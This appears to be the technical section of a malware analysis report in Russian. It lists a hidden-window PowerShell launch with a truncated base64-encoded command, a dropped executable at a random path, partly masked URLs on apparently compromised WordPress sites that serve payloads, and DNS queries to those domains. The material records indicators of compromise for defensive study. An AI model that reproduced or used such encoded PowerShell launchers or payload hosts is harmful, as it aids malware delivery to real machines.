Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUACAAMQA5AEMASQBwAGwAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAyAH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewA0AH0AIgAgAC0AZgAgACcAZAAnACwAJwBjAFQATwBSACcALAAnAHMAWQBzAHQARQ...
- %HOMEPATH%\q8r9mbt\k3h07md\fj8uu9t1.exe
- http://www.me##zs.com/wp-includes/E/
- http://www.an###thinh.com/autotoxication/Iue/
- http://www.ci###rencutl.ro/wp-admin/WhcybcaN/
- http://ci####search.com/wp-content/Cb5afhZDr6/
- http://yo##.gift/content/nc/
- DNS ASK me##zs.com
- DNS ASK gi#####arsalesgroup.com
- DNS ASK an###thinh.com
- DNS ASK ci###rencutl.ro
- DNS ASK ci####search.com
- DNS ASK th######uangcaothanhhoa.com
- DNS ASK yo##.gift
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUACAAMQA5AEMASQBwAGwAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAyAH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewA0AH0AIgAgAC0AZgAgACcAZAAnACwAJwBjAFQATwBSACcALAAnAHMAWQBzAHQARQ...' (со скрытым окном)